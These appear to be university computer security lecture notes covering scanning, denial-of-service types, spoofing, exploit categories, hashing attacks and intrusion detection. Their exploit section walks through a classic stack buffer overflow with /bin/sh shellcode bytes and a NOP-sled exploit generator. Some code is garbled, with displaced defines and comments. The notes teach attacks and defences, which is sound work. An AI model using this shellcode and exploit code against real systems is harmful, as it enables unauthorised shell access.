Prior to sniffing a network an attacker has to gain access. Attackers gain access by scanning devices on the network for vulnerabilities, then exploiting them. Port scanning can either be targeted or random. An attacker interested in a particular network will attempt to track down information about that network and scan for vulnerabilities. Alternatively, attackers will put large netblocks into a port scanner and let it run for days, trying to find any machine that is available and able to be exploited. A tool commonly used for port scanning is nmap (www.insecure.org/nmap/). It allows users to enter a range of IP addresses, choose the type of scan desired, and let the program run in the background. Nmap can be configured to scan all TCP and User Datagram Protocol (UDP) ports, or just the ports that generally have services running on them. Using the information collected in the example, notice there were 12 out of 1,589 scanned ports responding on the server. Once the list of ports and host names has been compiled, the next step is to try to exploit weaknesses in the various server configurations. This involves knowing what the weaknesses of the different servers are and exploiting those weaknesses. Denial of Service A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. One common method of attack involves saturating the target (victim) machine with external communications requests, such that it cannot respond to legitimate traffic, or responds so slowly as to be rendered effectively unavailable. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consume its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately. A "denial-of-service" attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. Attacks can be directed at any network device, including attacks on routing devices and web, electronic mail, or Domain Name System servers. A DoS attack can be perpetrated in a number of ways. The five basic types of attack are: 1. Consumption of computational resources, such as bandwidth, disk space, or processor time 2. Disruption of configuration information, such as routing information. 3. Disruption of state information, such as unsolicited resetting of TCP sessions. 4. Disruption of physical network components. 5. Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately. ICMP flood A smurf attack is one particular variant of a flooding DoS attack on the public Internet. It relies on misconfigured network devices that allow packets to be sent to all computer hosts on a particular network via the broadcast address of the network,

rather than a specific machine. The network then serves as a smurf amplifier. In such an attack, the perpetrators will send large numbers of IP packets with the source address faked to appear to be the address of the victim. The network's bandwidth is quickly used up, preventing legitimate packets from getting through to their destination. To combat Denial of Service attacks on the Internet, services like the Smurf Amplifier Registry have given network service providers the ability to identify misconfigured networks and to take appropriate action such as filtering. Ping flood is based on sending the victim an overwhelming number of ping packets, usually using the "ping -A" command from Unix-like hosts. It is very simple to launch, the primary requirement is being able to access greater bandwidth than the victim. SYN flood sends a flood of TCP/SYN packets, often with a forged sender address. Each of these packets is handled like a connection request, causing the server to spawn a half-open connection, by sending back a TCP/SYN-ACK packet, and waiting for packet in response from the sender address. However, because the sender address is forged, the response never comes. These half-open connections saturate the number of available connections the server is able to make, keeping it from responding to legitimate requests until after the attack ends. Teardrop attack A Teardrop attack involves sending mangled IP fragments with overlapping, over-sized, payloads to the target machine. A bug in the TCP/IP fragmentation re-assembly code of various operating systems causes the fragments to be improperly handled, crashing them as a result of this. Windows 3.1x, Windows 95 and Windows NT operating systems, as well as versions of Linux prior to versions 2.0.32 and 2.1.63 are vulnerable to this attack. Peer-to-peer attacks Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. The most aggressive of these peer-to-peer-DDoS attacks exploits DC++. Peer-to-peer attacks are different from regular botnet-based attacks. With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a 'puppet master,' instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victims website instead. As a result, several thousand computers may aggressively try to connect to a target website. While a typical web server can handle a few hundred connections/sec before performance begins to degrade, most web servers fail almost instantly under five or six thousand connections/sec. With a moderately big peer-to-peer attack a site could potentially be hit with up to 750,000 connections in a short order. The targeted web server will be plugged up and confused by the incoming connections. While peer-to-peer attacks are easy to identify with signatures, the large number of IP addresses that need to be blocked (often over 250,000 during the course of a big attack) means that this type of attack can overwhelm mitigation defenses. Even if a mitigation device can keep blocking IP addresses, there are other problems to consider. For instance, there is a brief moment where the connection is opened on the server side before the signature itself comes through. Only once the connection is opened to the server can the identifying signature be sent and detected, and the connection torn down. Even tearing down connections takes server resources and can harm the server. Permanent denial-of-service attacks A permanent denial-of-service (PDoS), also known loosely as phlashing, is an attack

that damages a system so badly that it requires replacement or reinstallation of hardware. Unlike the distributed denial-of-service attack, a PDoS attack exploits security flaws in the remote management interfaces of the victim's hardware, be it routers, printers, or other networking hardware. These flaws leave the door open for an attacker to remotely 'update' the device firmware to a modified, corrupt or defective firmware image, therefore bricking the device and making it permanently unusable for its original purpose. The PDoS is a pure hardware targeted attack which can be much faster and requires fewer resources than using a botnet in a DDoS attack. Application level floods On IRC, IRC floods are a common electronic warfare weapon. Various DoS-causing exploits such as buffer overflow can cause server-running software to get confused and fill the disk space or consume all available memory or CPU time. Other kinds of DoS rely primarily on brute force, flooding the target with an overwhelming flux of packets, oversaturating its connection bandwidth or depleting the target's system resources. Bandwidth-saturating floods rely on the attacker having higher bandwidth available than the victim; a common way of achieving this today is via Distributed Denial of Service, employing a botnet. Other floods may use specific packet types or connection requests to saturate finite resources by, for example, occupying the maximum number of open connections or filling the victim's disk space with logs. A "banana attack" is another particular type of DoS. It involves redirecting outgoing messages from the client back onto the client, preventing outside access, as well as flooding the client with the sent packets. An attacker with access to a victim's computer may slow it until it is unusable or crash it by using a fork bomb. A 'pulsing zombie' is a term referring to a special denial-of-service attack. A network is subjected to hostile pinging by different attacker computers over an extended amount of time. This results in a degraded quality of service and increased workload for the network's resources. This type of attack is more difficult to detect than traditional denial-of-service attacks due to their surreptitious nature. Nuke A Nuke is an old denial-of-service attack against computer networks consisting of fragmented or otherwise invalid ICMP packets sent to the target, achieved by using a modified ping utility to repeatedly send this corrupt data, thus slowing down the affected computer until it comes to a complete stop. Modern operating systems are usually resistant to these nuke attacks, and online games now have third party "Flood control."

Distributed attack
A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood the bandwidth or resources of a targeted system, usually one or more web servers. These systems are compromised by attackers using a variety of methods. Malware can carry DDoS attack mechanisms; one of the more well known examples

of this was ?MyDoom. Its DoS mechanism was triggered on a specific date and time. This type of DDoS involved hardcoding the target IP address prior to release of the malware and no further interaction was necessary to launch the attack. A system may also be compromised with a trojan, allowing the attacker to download a zombie agent (or the trojan may contain one). Attackers can also break into systems using automated tools that exploit flaws in programs that listen for connections from remote hosts. This scenario primarily concerns systems acting as servers on the web. These collections of compromised systems are known as botnets. DDoS tools like stacheldraht still use classic DoS attack methods centered around IP spoofing and amplification like smurf attacks and fraggle attacks (these are also known as bandwidth consumption attacks). SYN floods (also known as resource starvation attacks) may also be used. Newer tools can use DNS servers for DoS purposes. (see next section) Unlike ?MyDoom's DDoS mechanism, botnets can be turned against any IP address. Script kiddies use them to deny the availability of well known websites to legitimate users. More sophisticated attackers use DDoS tools for the purposes of extortion even against their business rivals. It is important to note the difference between a DDoS and DoS attack. If an attacker mounts a smurf attack from a single host it would be classified as a DoS attack. In fact, any attack against availability would be classed as a Denial of Service attack. On the other hand, if an attacker uses a thousand zombie systems to simultaneously launch smurf attacks against a remote host, this would be classified as a DDoS attack. The major advantages to an attacker of using a distributed denial-of-service attack are that multiple machines can generate more attack traffic than one machine, multiple attack machines are harder to turn off than one attack machine, and that the behavior of each attack machine can be stealthier, making it harder to track down and shut down. These attacker advantages cause challenges for defense mechanisms. For example, merely purchasing more incoming bandwidth than the current volume of the attack might not help, because the attacker might be able to simply add more attack machines. Reflected attack A distributed reflected denial of service attack (DRDoS) involves sending forged requests of some type to a very large number of computers that will reply to the requests. Using Internet protocol spoofing, the source address is set to that of the targeted victim, which means all the replies will go to (and flood) the target. ICMP Echo Request attacks (Smurf Attack) can be considered one form of reflected attack, as the flooding host(s) send Echo Requests to the broadcast addresses of mis-configured networks, thereby enticing many hosts to send Echo Reply packets to the victim. Some early DDoS programs implemented a distributed form of this attack. Many services can be exploited to act as reflectors, some harder to block than others.DNS amplification attacks involve a new mechanism that increased the amplification effect, using a much larger list of DNS servers than seen earlier. Spoofing One way of preventing brute force attacks is to instruct network software to accept

connections only from trusted IP addresses within a private network. Savvy hackers can send data packets into your network with a "sending address" that appears to belong to one of the trusted internal computers, in a type of attack called spoofing. The receiving computer sends its replies to the internal computer being impersonated, not back to the hackers. But the hackers, knowing that they are working blindly, just keep sending in strings of commands, hoping that everything is working. They might be able to mail themselves a password file, alter Registry values, and so on. This technique is actually quite a serious security risk with network services such as rsh, FTP, and telnet. Exploits What is an exploit? Exploitation is defined as manipulation to one's advantage. In a computing context it refers to an attack on a system by means of an apt utilisation of a networks vulnerability. As such, exploits in computer security are based on taking advantage of such vulnerabilities/bugs in software and/or hardware. Take home messages: Writing safe code is very difficult. Exploiting unsafe code is very tedious and time consuming. Types of Exploit Common exploits: DDoS SQL Injection Spoofing Code Execution Data Access Privilage Elevation Cross-site scripting Buffer overflow Software exploits fall under a number of categories, which are largely dependant on 3 main factors: 1. The type of vulnerability involved. Microsoft has an acronym, STRIDE, to categorize different threat types. STRIDE stands for: Spoofing. Spoofing is attempting to gain access to a system by using a false identity. This can be accomplished using stolen user credentials or a false IP address. After the attacker successfully gains access as a legitimate user or host, elevation of privileges or abuse using authorization can begin. Tampering. Tampering is the unauthorized modification of data, for example as it flows over a network between two computers. Repudiation. Repudiation is the ability of users (legitimate or otherwise) to deny that they performed specific actions or transactions. Without adequate auditing, repudiation attacks are difficult to prove. Information disclosure. Information disclosure is the unwanted exposure of private data. Denial of service.

Elevation of privilege. Elevation of privilege occurs when a user with limited privileges assumes the identity of a privileged user to gain privileged access to an application. For example, an attacker with limited privileges might elevate his or her privilege level to compromise and take control of a highly privileged and trusted process or account. reference 2. The location of attack origin (Remote, Local or Client) Remote exploits target vulnerabilities in network services which listen for connections on a TCP or UDP port. Examples include vulnerabilities in web services (HTTP or HTTPS) or mail services (SMTP, POP3, or IMAP). Remote exploits do not typically require prior access to the target before the exploit can be attempted. Local exploits target vulnerabilities in entities which are not accessible across a network, such as the operating system kernel or services which do not accept remote connections. Local exploits require prior access to the target, and therefore there must be an existing connection to the target before the exploit can be attempted. Remote exploits target remote command execution vulnerabilities, local exploits target privilege elevation vulnerabilities. 3. The result of the exploit The result of an exploit is mostly bound by the hackers imagination. Common goals/results are data access, elevation of privilage (getting root), Denial of Service (freezing/crashing a system), Spoofing (posing as another person or program) and even arbitraty code execution! One particular category of exploit involves attacking the user interface, which depends on supplying input to the application through its user interface. The most common such exploit is the input buffer overflow, which involves the application failing to properly constrain input length. The unexpected input string from the user can compromise the situation and lead to the supplied data overwriting application instructions, allowing the non-root user to execute arbitrary code and gain root access.
Registers x86 CPU

eip - The instruction pointer. esp - stack pointer. ebp - base pointer. eax,ebx,ecx,edx,esi,edi - general purpose registers. These all have intended uses but are essentially general purpose. eax is often for return values and for system calls. The e*x registers can also be split into *x which is the lower 16 bits, *l which is the lowest 8 bits and *h which is the next 8 bits. The e stands for extended and came about when CPUs went from 16 bit to 32 bit. * Assembly Language Registers are prefixed by %
PUSH %esp

Immediate values (ie. actual memory addresses) are prefixed by $

PUSH $0xb

Instructions which involve 2 operands are of the format:


MOV source, destination

All instructions that operate on a number are postfixed with the length of the operands. For example:
MOVL, MOVB, PUSHW

Where L corresponds to long, B corresponds to byte and W corresponds to word NOP (short for No OPeration) - a command that effectively does nothing at all. Can put it in your assembly program to as a "filler" force memory alignment.
NOP

Example, adding 1 + 2 into the eax.


__asm__( "movl $0x1, %eax\n\t" "addl $0x2, %eax" );

Suppose eax contains an array offset and esi contains the address of the array, the following would put the value of the array at index eax into ebx.
__asm__( "movl (%esi, %eax), %ebx" );

However the following puts array[2] in ebx.


__asm__( "movl 2(%esi), %ebs" );
Stack Overview

A dynamic data structure Often used to store temporary information (eg. during functions calls) Last In First Out Accessing the stack: 1. Stack pointer: a register (esp) that points to the top of the stack 2. Base (or frame) pointer: a register (ebp) that points to the bottom of the current stack frame Two basic operations:

1. Push: Add an item to top of the stack. Adjusts the stack pointer by the size of the item. 2. Pop: remove an item from the top of stack. Adjusts the stack pointer by the size of the item. Function Calling Sequence: 1. PUSH to store parameters onto stack 2. CALL to push return address (instruction after CALL) onto stack 3. PUSH to store old %ebp (base pointer) onto stack 4. MOVL to update %ebp with current value of stack pointer 5. Increment %esp (stack pointer) to allow some space for local variables Seminar/Exploit/StackDiagram.jpg First of all the calling function pushes the parameters onto the stack in the reverse order. The CALL instruction pushes the address of the next instruction onto the stack. Each function then does the following:
PUSH %ebp MOVL %esp, %ebp

This means the old ebp is at (%ebp), the return address is at 0x4(%ebp), and the parameters start at 0x8(%ebp). After the function is finished it then does:
MOVL %ebp, %esp POP %ebp RET

RET pops the value at %esp into the instruction pointer. Often the instruction LEAVE is used instead of the first two lines. As you can see, this relies on the return address being what was pushed on the stack when the CALL instruction was executed. So if we can somehow overwrite this return address we can take control of the program or at the very least crash it. Function Returning Sequence: MOVL to update %esp (stack pointer) with current value of %ebp (base pointer). This frees the space previously allocated for local variables. POP to retrieve old %ebp from stack (base pointer now back in original position) RET to pop return address from stack POP parameters from stack Seminar/Exploit/StackDiagram2.jpg What's this got to do with Exploits? Fact: When the function exits, program execution continues at the instruction pointed to by the return address Our Aim: to write over the return address while it's stored on the stack Result: When function returns, program execution will continue anywhere you want (perhaps somewhere in memory where you have planted some malicious code!)

Writing an exploit

The most useful thing would be to get a shell. We could make it do other things too, but with a shell we can then run whatever we want. Getting a shell The easiest way to get a shell would be to use execve. We'll compile a small program so that we can see how execve should be called.
int main(int argc, char *argv[]) { char *name[2]; name[0] = "/bin/sh"; name[1] = 0; execve("/bin/sh", name, 0); }

gcc -static execve.c -o execve gdb execve disas main

Then need to disassemble the various functions that are called to see exactly what is going on. The important bits: %eax contains 0xb in it. The address of the string "/bin/sh" needs to be on the stack for the first parameter. ebx contains the pointer to the string. ecx contains the pointer to the name array which has to be in memory somewhere. edx contains 0. We need to do the function prologue ourselves. The SYSENTER instruction is called. We can reuse the "/bin/sh" string. So all we need to do is put a pointer to it and a 0 on the stack then point ecx to that. We don't expect this to return so we can ignore the usual function call set up. Now we have a problem, what's the address of "/bin/sh"? There is a little trick we can use here, if we execute a call instruction which is just before our string then the address of the string will be on the stack. So what we can do is jump to the call, then the call goes back to the address after the jump. The code would look like this.
JMP end start: POPL %esi MOVL %esi, (%esp) the name array MOVL $0x0, 0x4(%esp) name array MOVL %esi, %ebx # jumps to the call # store the address in a register # store the address of the string for # store the null terminator for the

# address of string for function call

MOVL %esp, %ecx call MOVL $0x0, edx MOVL 0xb, %eax

# address of name array for function # 0 for third parameter # needed for the system call

SYSENTER # do the system call end: CALL start # puts the address on the stack and jumps to the second instruction .string \"/bin/sh\"

This can be compiled using inline assembly with gcc. You can then print out the opcodes using gdb:
gdb a.out disas main x/60bx main+14

disas main prints the disassembly of the function main. This will tell you where your assembly starts, on my computer it was main+14. The command x/ prints 60 bytes in hex. You will get something that looks like this:
0x8048392 <main+14>: 0x00 0x00 0x00 0x804839a <main+22>: 0x24 0x04 0x00 0x80483a2 <main+30>: 0x89 0xe1 0xba 0x80483aa <main+38>: 0x6e 0x08 0x0f 0x80483b2 <main+46>: 0xff 0x2f 0x62 0x80483ba <end+7>: 0x00 0xb8 0x00 0x80483c2 <end+15>: 0x8d 0x61 0xfc 0x80483ca <end+23>: 0xeb 0x89 0x00 0x00 0x34 0x69 0x00 0xc3 0x1f 0x34 0x00 0x00 0xe8 0x6e 0x00 0x90 0x5e 0x24 0x00 0x00 0xdc 0x2f 0x00 0x90 0xb8 0xc7 0x89 0x00 0xff 0x73 0x59 0x90 0x0b 0x44 0xf3 0x8d 0xff 0x68 0x5d

Note that I used 60 because I'm lazy and didn't work out how long the code was, it actually ends on the line end+7 with the code 0x73 0x68 0x00. You can then type that out into a string in c and put it into a test program just to make sure it works.
char shellcode[] = { "\xeb\x1f\x5e" "\xb8\x0b\x00\x00\x00" "\x89\x34" "\x24\xc7\x44" "\x24\x04\x00\x00\x00" "\x00\x89\xf3\x89" "\xe1\xba\x00\x00\x00\x00" "\x8d\x6e\x08" "\x0f\x34"

"\xe8\xdc\xff\xff\xff\x2f" "\x62\x69\x6e\x2f\x73\x68\x00" }; int main() { void (*f)() = (void(*)())&shellcode; (*f)(); return 0; }

We now have a problem. Our exploit will most likely rely on strcpy not checking the length of input. Strings are terminated by 0, this means we can't have any zeros in our shell code. So we have to remove all the zeros by rewriting some parts of the assembly. Guidelines for removing zeros: Most instructions which use eax will have a zero, consider using another register. pop and push are exceptions. Loading 0 as an immediate value will put a zero in. Consider xoring a register with itself. Loading other immediate values may involve zeros, like 0xb when it's 4 bytes long, the other three bytes will be zero. Consider using bytes or 2 byte values or adding registers instead of loading immediate values. After removing the zeros the code looks like this:
jmp end start: popl %esi xorl %ebx, %ebx movl %ebx, 0x4(%esp) movl %ebx, %edx movl %ebx, 0x8(%esi) xor %eax, %eax movb $0xb, %al movl %esi, (%esp) movl %esi, %ebx movl %esp, %ecx sysenter end: call start .string \"/bin/sh\"

The shell code is:


"\xeb\x1c\x5e\x31\xdb\x89\x5c\x24" "\x04\x89\xda\x89\x5e\x08\xb3\x0b" "\x53\x58\x89\x34\x24\x89\xf3\x89" "\xe1\x8d\x6e\x08\x0f\x34\xe8\xdf" "\xff\xff\xff\x2f\x62\x69\x6e\x2f" "\x73\x68"

The next step is to put this into a string so that we can actually overflow the buffer. The main thing we are trying to do is to overwrite the return address so that it points to our shellcode. It's really hard to know where our shell code will actually be

though, so we put what is called a NOP sled in our buffer. The idea is that the address we overwrite will point to somewhere in the NOP sled. The CPU will execute a whole lot of NOPs and then run our shell code. Seminar/Exploit/Notes/stackoverflow2.png The following program puts the NOP sled, shellcode and return address into the environment variable EGG.
#include <stdlib.h> #include <stdio.h> #include <string.h> #define DEFAULT_OFFSET #define DEFAULT_BUFFER_SIZE #define NOP char shellcode[] = "\xeb\x1c\x5e\x31\xdb" "\x88\x5e\x07" "\x89\x5c\x24" "\x04\x89\xda\x89\x5e\x08\x31\xc0" "\xb0\x0b\x89\x34\x24\x89\xf3\x89" "\xe1\x0f\x34\xe8\xdf\xff\xff\xff" "\x2f\x62\x69\x6e\x2f\x73\x68"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } int main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; 0 512 0x90

buff[bsize - 1] = '\0'; memcpy(buff,"EGG=",4); putenv(buff); system("/bin/bash"); }

The program is run using:


./exploit buffer-size offset

buffer-size is the size of the buffer you will be writing. About 100 bigger than the buffer it is going into is a good starting point. Offset is the offset from the stack pointer to use, you will usually have to fiddle with this a bit until it works. From the command line you could now set your buffer as $EGG, or save it to a file and pipe it in or whatever you need to do to write to the buffer.
Other Exploits

format strings mainly happen from programmers using print(buffer) instead of print("%s",buffer) uses printf's %n specifier to write to an arbitrary address in memory easy to fix if they occur heap overflows similar to stack overflows but on the heap as such can not overwrite the return address - only other items on the heap return into lib c attacks use system() libc function to call /bin/sh - use gdb to get the address of the system libc call and set this as the return address can work on non-exec stacks store variables in environment function pointer overflows if function pointer is in a struct and there is a buffer overflow on one of the other values in the struct you can alter the function pointer to point to what ever you want.
Buffer Overflow Countermeasures

As we can see buffer overflows are critical security vulnerabilities. So how can we counter them? 1. Canary Based At the highest level of abstraction, compilers can insert a value in the stack called a "canary" which is a hash of the current return pointer on the stack, if a stack variable gets overflown and alters the return address, the said canary will not match (since it is hashed with the return address and a secret), at this point the application will stop executing. Used to show when a buffer overflow attack has occurred. Value is placed on the stack just before the return address. Top of stack (0xFFFFFFFF)

Stack without canary ... parameters passed to function function's return address (RET) local frame pointer (%ebp) local variables ... ... Bottom of stack (0x00000000)

Stack with canary ... parameters passed to function function's return address (RET) canary local frame pointer (%ebp) local variables ...

The stack and where the canary resides in memory The Terminator canary Uses terminators (CR, LF, EOF, NULL) to terminate string operations and hence prevent buffer overflows. Canary value is known and could still be exploited. The Random canary Canary value is computed at run-time. Value should be logically impossible to pre-determine. The Random XOR canary Same an random canary XOR with control data. This prevents tampering with the canary value and control data in the program. Still susceptible to the same vulnerabilities as the random canary. How does the canary work? When a buffer overflow attack occurs, the canary value is overwritten as well as the return address. When function finishes, check canary value if it has changed, then we cannot trust the return address. Top of stack (0xFFFFFFFF) Stack before attack ... parameters passed to function function's return address (RET) local frame pointer (%ebp) canary (0xABCDABCD) local variables ... Stack after attack ... parameters passed to function function's return address (RET) local frame pointer (%ebp) canary (0xFFFFFFFF) local variables ...

Bottom of stack (0x00000000) Limitations Canary value only protects against buffer overflow attacks. Other attacks, such as function pointer overflowing, can overwrite the return address without modifying the canary value. Non-Executing Stack Based This defence is quite simple really, it makes the stack non executable. At present there is no mainline support for non-executable stacks in Linux, there are however a couple of options It should also be noted that not all types of attacks can be foiled by using this type of technique. return to lib c attacks can get past this type of protection 1. Address Space Randomisation Address space randomisation randomises the starting point of the stack for each process. It makes bot type mass exploits harder since the stack pointer and address is always moving around. On 32 bit systems attackers can still calculate the list of available address spaces, but on 64 bit systems the address range is too large to guess the address. 1. Other 2. libsafe 3. Firewall: a good firewall rule set that will not allow attackers to connect to the shell that they spawn will help out as well.

Week5/NiceNotes
Hashing
Hashing summarises piece of information. Large input -> (generally smaller) fixed size output. Good hash functions distribute randomly...minimising collisions. Cryptographic hash functions need to be tamper resistant. Breaking a hash function means finding a weakness. Everybody is interested in crypto for ciphers, but not many of them are working on hashing functions. When MD5 was broken, then we didn't have many left. SHA family still works, and there a few newer ones, but for a while it was quite scary as we didn't have many hash functions.

Hash Function
Converts an input of an arbitrary-length string of bits into a particular fixed-length output. In general, the output (which is often called "the hash value" or just "the hash") can be used as a fixed-size representation of the input. Many functions can take an arbitrary-length input and return an output of fixed length, but one-way hash functions have additional characteristics that make them one-way:

1. Cryptographic hash functions A cryptographic hash function is a transformation that takes an input (or 'message') and returns a fixed-size string, which is called the hash value(sometimes termed a message digest, a digital fingerprint, a digest or a checksum). The ideal hash function has three main properties - it is extremely easy to calculate a hash for any given data, it is extremely difficult or almost impossible in a practical sense to calculate a text that has a given hash, and it is extremely unlikely that two different messages, however close, will have the same hash. These hash functions need to be resilient against tampering, as people are actually trying to attack them. Examples of cryptographic hash functions: message integrity checks, digital signatures, and authentication. A one-way hash function, H(M), operates on an arbitrary-length pre-image message, M. It returns a fixed-length hash value, h. h = H(M), where h is of length m

Properties of a Hash Function


The most important property of a hash function is that it takes a large size input, and gives a (generally smaller) fixed size output, i.e. compression - h (a hash function) maps an input x of arbitrary finite bit length, to an output h(x) of fixed bit length n. Good hash functions have some features in common: A good hash function should distribute in a random way in order to minimise collisions (uniform probability distribution). for an arbitrary input, each bit in the output has an equal probability of being an 1 or 0 It should be just as likely that there will be no collisions, as it is that there will be collisions. finding an arbitrary pair of messages that have the same hash should require about 2(n/2) guesses The hash function should be easy to compute, but it should be very difficult to calculate that a text has a given hash. i.e. given a particular message, finding another message that has the same hash should require about 2n guesses i.e. given a particular hash value, finding a message that has that hash should require about 2n guesses Good cryptographic hashes in addition should be one-way: Given M, it is easy to compute h. Given h, it is hard to compute M such that H(M) = h. Given M, it is hard to find another message, M, such that H(M) = H(M). This is extremely important as a cryptographic hash is usually used to provide a fingerprint of M that is unique. If Alice signed M by using a digital signature algorithm on H(M), and Bob could produce M, another message different from M where H(M) = H(M), then Bob could claim that Alice signed M. It is hard to find two random messages, M and M, such that H(M) = H(M). (collision resistance)

Undesirable properties include: If the message size is smaller than the size of the hash function, then we have a problem (we can brute force easily). It's useless!

Examples of Hashing
MD5 Message-Digest algorithm 5 (MD5) is a common cryptographic hash function designed by Ronald Rivest in 1991. MD5 has a 128-bit hash value. This relatively small hash size leaves MD5 open to birthday attacks. In 1996 a flaw was found (a collision of the compression function) making it's use for cryptographic purposes questionable. And in 2004, collisions for the full MD5 was announced, pushing cryptographers to use other algorithms such as SHA-1. MD5 is commonly used for checking download alterations and for password storage. This presents a serious problem, now that MD5 has been compromised. SHA family The Secure Hash Algorithm (SHA) family is a family of hash functions developed by the NSA. Used in many security applications such as TLS, SSL, and SSH. The most commonly used function is SHA-1, which took over from MD5 as the predominant hash function, once MD5 was found to be compromised. SHA-1 has a 160-bit hash and is based on similar principles to MD5. It is believed that SHA-1 has now been compromised, however SHA-2 (longer variants of the SHA family) are still believed to be safe. Hashed Message Authentication Code (HMAC) HMAC is a message authentication code (MAC) calculated using a cryptographic hash function in combination with a secret key.

where: h is a cryptographic hash function K is a secret key padded with extra zeros to match the block size of the hash function m is the message to be authenticated || denotes concatenation denotes exclusive or (XOR) opad is the outer padding (value = 0x5c5c5c...5c5c) ipad is the inner padding (value = 0x363636...3636) The outer application of the hash function masks the intermediate result of the internal hash. There have been no known extension attacks found against this so far. We do NOT want to: Hash the message, and combine the key after.

An attacker would be able to extract the hash and the result, and thus be able to deduce the key. Put the key in front of the message, then hash. Depending on the hash functions implementation, an attacker could add data to the end of the message without knowing the key and obtain a valid MAC. This is known as a length extension attack. Put the key in the back of the message, then hash This is weak to pre-image attacks, due to the chaining effect of the message blocks. Casting Nines If you take a series of numbers, like
2978 + 1356 + 2489 + 3217 -----10049

You add them up and want to check that your addition is probably correct, do the digit sums and throw away the nines (i.e. either subtract the nine so that you have a one digit number or keep adding until you have a one digit number - these are equivalent):
2978 1356 2489 3217 ----10049 -> -> -> -> -> 8 6 5 4 5

Result:
8 + 6 + 5 + 4 = 23 23 is not a one digit number so keep going... 2 + 3 = 5 By casting away the nines, we came up with a check value of 5 which matches our answer value. Hence, our sum is likely correct.

For more information on this example please go to and look for the 'Casting Nines' explanation.

Hash Function Attacks


What does a break mean for a hash function? If M1 is a message and h is a hash function, then:

Given a h(M1) find M1 or find M2 such that h(M1) = h(M2). What does it mean to say that a hash function has been broken? It means that one of the attacks (e.g. birthday attack, preimage attack) can be carried out faster than brute force attack. Once it is broken, then we know that there is something not random about it. Broken simply means we have found a weakness in the function. Preimage Attack What is a preimage attack? A Pre-image attack is an attack on a cryptographic hash that attempts to find a message that has a given hash value. First Preimage Attack Objective: Given a hash h(M), find the message M. If I have an n bit hash, how much work do I have to do break it? 2(n-1) E.g. MD5 was 128 bit hash, so I need to do 2127 amount of work to break it Second Preimage Attack Objective: Given the message M1, find a different message M2, such that h(M1) = h(M2). h(M1) = h(M2) is a collision. Birthday Attack Given a function h, the goal of an attack is to find two inputs M1 and M2, such that h(M1) = h(M2) . The pair M1, M2 is a collision. The method used to find a collision is to simply evaluate the function h for different input values that may be chosen randomly or pseudo-randomly until the same result is found more than once. The principle and mathematics behind the birthday attack is based on the birthday paradox. How much work do I have to do to find a collision using a birthday attack: n1/2 (square root of n work). Example: Birthday Paradox It is the probability that in a set of randomly chosen people some pair of them will have the same birthday. In a group of 23 (or more) randomly chosen people, there is more than 50% probability that some pair of them will both have been born on the same day. For 57 or more people, the probability is more than 99%, reaching 100% as the number of people reaches 366. In class Richard asked peoples birthdays starting from one end of the room. He compared each new birthday with the previous birthdays. After 25 people we got a match!

Richard felt confident that he wouldn't get a match for Gwen's birthday (preimage attack), but yet he was confident that asking everyone their birthdays and then comparing them all the birthdays that he would get a match. Why? When Richard was trying to find a match to Gwen's birthday, he was only trying to match one birthday. But when he went around comparing everyone's birthdays, there were many more birthdays that were potential matches. Length Extension Attack Let's say you have a message M1 that is split into r blocks, such that M1 = m1, m2,...mr e.g. Give the bearer of this note $1.50 Encrypting: I add a key to the front, I get the first 128 bits, and apply a crazy function, get the output and then I do it again (i.e. apply crazy function to output. Then use this new output as the input and apply crazy function again...and so on). The MD5 does this. Attack: If I wanted to add something to the end of the message (M1) such that I got an extended message (M2) M2 = m1, m2,...mr, mr+1 e.g. Give the bearer of this note $1.50 and a tonne of gold, Since I know the previous result of encrypting M1, I can just keep folding it through. I don't need to know the secret because it is summarised in the message already. Also known as a "message expansion attack". Prefix Attack

Intrusion Detection System


Intrusion Detection System (IDS): a network security device that monitors network and/or system activities for malicious or unwanted behavior and alerts admin. Intrusion Prevention System (IPS): a network security device that monitors network and/or system activities for malicious or unwanted behavior and takes measures to prevent damage. Stupid measures could be severing the system from the internet, smarter measures could include temporarily preventing read access to protected information, or write access to system critical data. One disadvantage of an IDS/IPS is that it may have access to a large number of systems in a network and therefore provide a juicy target for an attacker. An IDS is just like a burglar alarm. It consists of connections to each sub network in your system and monitors them for suspicious behaviour (access out of work hours) and suspicious strings (nop sleds). Sniffing your own network One of the way you do it is have a signature file. Database of signatures. Use these signatures to match to strings in network traffic to detect possible intrusion. Program to search strings in the network traffic:

What sort of things would you look for: NOP Sleds, etc But when people write programs to detect these things, then people find a way to go around it. E.g. NOP sled: there are lots of ways of doing nothing. Signatures are very reactive thing, and someone clever can thwort signatures. It's better than nothing IDS is like a buglar alarm: sensors in the machine, and when people do things that are suspicous an alarm goes off. Types of IDS A network intrusion detection system (NIDS) is an independent platform which identifies intrusions by examining network traffic and monitors multiple hosts. Network Intrusion Detection Systems gain access to network traffic by connecting to a hub, network switch configured for port mirroring, or network tap. An example of a NIDS is Snort. A protocol-based intrusion detection system (PIDS) consists of a system or agent that would typically sit at the front end of a server, monitoring and analyzing the communication protocol between a connected device (a user/PC or system). For a web server this would typically monitor the HTTPS protocol stream and understand the HTTP protocol relative to the web server/system it is trying to protect. Where HTTPS is in use then this system would need to reside in the "shim" or interface between where HTTPS is un-encrypted and immediately prior to it entering the Web presentation layer. An application protocol-based 